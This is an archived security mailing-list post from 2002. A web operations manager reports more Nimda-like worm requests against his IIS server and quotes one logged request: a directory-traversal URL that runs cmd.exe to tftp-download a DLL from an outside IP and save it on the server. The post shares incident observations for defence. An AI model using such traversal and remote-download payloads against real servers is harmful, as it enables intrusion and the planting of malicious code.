I am also seeing an upsurge in Nimda-Like exploit requests. This is just one example. http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.19 7180.98%20GET%20cool.dll%20c:\httpodbc.dll. Users IP : 65.197.180.98 New DLL's are showing up in these requests, although the methods of execution remain the same. Perhaps someone has thrashed another core IIS/Win32 dll and is attempting to exploit? Pretty sure httpodbc.dll is in use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;)) Another thing I've noticed is the number of requests per IP has gone up. Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between 50 and 80 from the infected host. It does still appear to be automated / worm activity. Just thought I'd let the lists know. ;-) Joshua Hiller Manager Web Operations AeA Advancing the Business of Technology ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 15:32:26 PST